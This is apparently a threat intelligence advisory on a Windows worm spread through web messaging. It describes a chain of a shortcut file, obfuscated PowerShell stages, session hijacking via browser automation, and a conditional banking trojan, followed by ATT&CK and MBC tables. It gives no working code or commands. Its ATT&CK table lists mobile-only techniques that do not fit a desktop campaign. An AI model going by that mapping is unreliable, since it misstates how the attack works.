EXECUTIVE SUMMARY:
This campaign leverages web-based instant messaging sessions to deliver a self-propagating Windows worm that targets desktop users in a specific national financial market. Attackers distribute a compressed archive that contains a crafted shortcut file which, when opened on a computer, executes an obfuscated command that decodes and runs a staged PowerShell script. The first scripted stage uses a legitimate system process as cover to fetch a second-stage command from remote infrastructure and attempts to alter local security controls to reduce detection. Depending on runtime checks, the chain either installs a browser automation component that can take control of an authenticated web messaging session to forward the same malicious archive to contacts, enabling contact-based propagation, or it installs a feature-rich banking trojan tailored to monitor and interact with active browser sessions for financial and exchange activity. Affected systems are desktop operating environments where users access the messaging web client and open archive attachments on a computer. Potential business impact includes unauthorized access to customer financial accounts, fraudulent transactions, disruption to online finance services, increased incident response workload, reputational harm, and direct financial loss arising from targeted banking fraud.
The technical chain is multi-stage and intentionally obfuscated to frustrate detection and analysis. The initial artifact is a compressed archive delivered through a trusted messaging contact; inside is a Windows LNK shortcut whose target field contains an obfuscated command that reconstructs and executes a Base64-encoded PowerShell payload. The first PowerShell stage covertly spawns a legitimate system process and uses it to download a second-stage PowerShell command from remote infrastructure. The second stage contains comments and commands that aim to modify local defenses, specifically indicating goals to add exclusions and to alter elevation controls. The actor performs environment and anti-analysis checks and then selectively delivers one of two payloads: a widely used browser automation framework plus matching driver to control an already-authenticated web messaging session and reproduce the malicious archive to contacts, or a managed .NET banking trojan that monitors active browser sessions and only activates when traffic matches targeted financial and exchange domains. The chain uses multiple remote infrastructure endpoints, obfuscation, and legitimate third-party tooling to blend with normal activity and limit exposure of the banking component to only targeted hosts.
The campaign combines trusted-contact social engineering, multi-stage script execution, selective payload staging, and browser session manipulation to pursue financially motivated objectives while enabling efficient self-propagation through contacts. Observed impacts include widespread obfuscated PowerShell execution across many endpoints, attempts to alter local security controls to reduce detection, installation of browser automation tooling that can hijack authenticated messaging sessions to propagate the worm, and conditional deployment of a banking trojan on hosts that match financial targeting criteria. The design balances stealth and spread obfuscation and use of legitimate processes and tools reduce detection probability, while session hijacking and delivery via trusted contacts increase user execution likelihood. In the broader threat landscape, this campaign aligns with financially motivated actors that prioritize targeted banking fraud, use living-off-the-land script execution, and leverage legitimate automation tooling to extend capabilities and complicate detection and analysis. The campaign’s selective staging model concentrates harm on users and systems engaged in targeted financial activity, raising the risk of focused financial losses and operational disruption for affected financial and cryptocurrency services.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub Technique |
| Resource Development | T1588.002 | Obtain Capabilities | Tool |
| T1583.001 | Acquire Infrastructure | Domains | |
| Initial Access | T1476 | Deliver Malicious App via Other Method | - |
| Execution | T1576 | Manipulate Mobile OS File | - |
| Persistence | T1628 | Modify System Permissions | - |
| Defense Evasion | T1406 | Obfuscate Files or Information | - |
| T1624.001 | System Software: | Abuse Accessibility Features | |
| Credential Access | T1416 | Capture Input | - |
| T1517 | Access Contact List | - | |
| Collection | T1533 | Data from Local System | - |
| T1430 | Location Tracking | - | |
| Lateral Movement | T1475 | Deliver Malicious App via Messaging | - |
| Command and Control | T1437.001 | Standard Application Layer Protocol | Web Protocols (HTTP/HTTPS) |
| Impact | T1445 | Generate Fraudulent Advertising Revenue | - |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Initial Access | E1204 | User Execution |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys |
| F0013 | Scheduled Tasks | |
| Defense Evasion | E1027 | Obfuscated Files/Information |
| B0003 | Dynamic Analysis Evasion | |
| Discovery | E1082 | System Information Discovery |
| Credential Access | E1055 | Process Injection |
| Collection | E1083 | File/Directory Discovery |
| E1113 | Screen Capture | |
| E1510 | Clipboard Modification | |
| Lateral Movement | E1569 | System Services |
| Command & Control | C0002 | HTTP Communication |
| Impact | B0019 | Manipulate Network Traffic |
REFERENCES:
The following reports contain further technical details: